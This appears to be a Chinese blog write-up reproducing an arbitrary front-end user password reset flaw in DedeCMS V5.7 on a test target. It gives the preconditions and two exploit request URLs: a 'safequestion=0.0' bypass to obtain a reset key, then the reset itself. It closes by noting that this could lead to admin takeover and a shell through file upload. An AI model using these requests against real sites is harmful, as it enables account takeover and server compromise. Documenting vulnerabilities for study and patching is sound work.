DedeCMS-V5.7前台任意用户密码重置

时间  2021-03-07 标签 安全漏洞

DedeCMS-V5.7前台任意用户密码重置

1 漏洞影响
该漏洞允许攻击者修改任意前台用户密码。

2 漏洞利用条件
1,开启会员模块
2,攻击者拥有一个正常的会员账号
3,目标没有设置安全问题

  1. 漏洞复现:
    注册两个账号
    1.0000001 作为攻击账号 id=2
    在这里插入图片描述

2.test 作为目标账号 id=3
在这里插入图片描述

/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=3
在这里插入图片描述

拿到key
/uploads/member/resetpassword.php?dopost=getpasswd&id=3&key= HTnYSD5W
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

按照其他博主的博客,应该是可以实现修改admin用户的密码的,但可能是我的靶机搭的有问题,所以就没有继续进行admin用户密码的修改,结合前台用户密码修改是可以实现对后台密码修改的,这样就拿到了后台权限,结合后台的文件上传也就可以拿下shell了

联系我们 沪ICP备2021010478号-7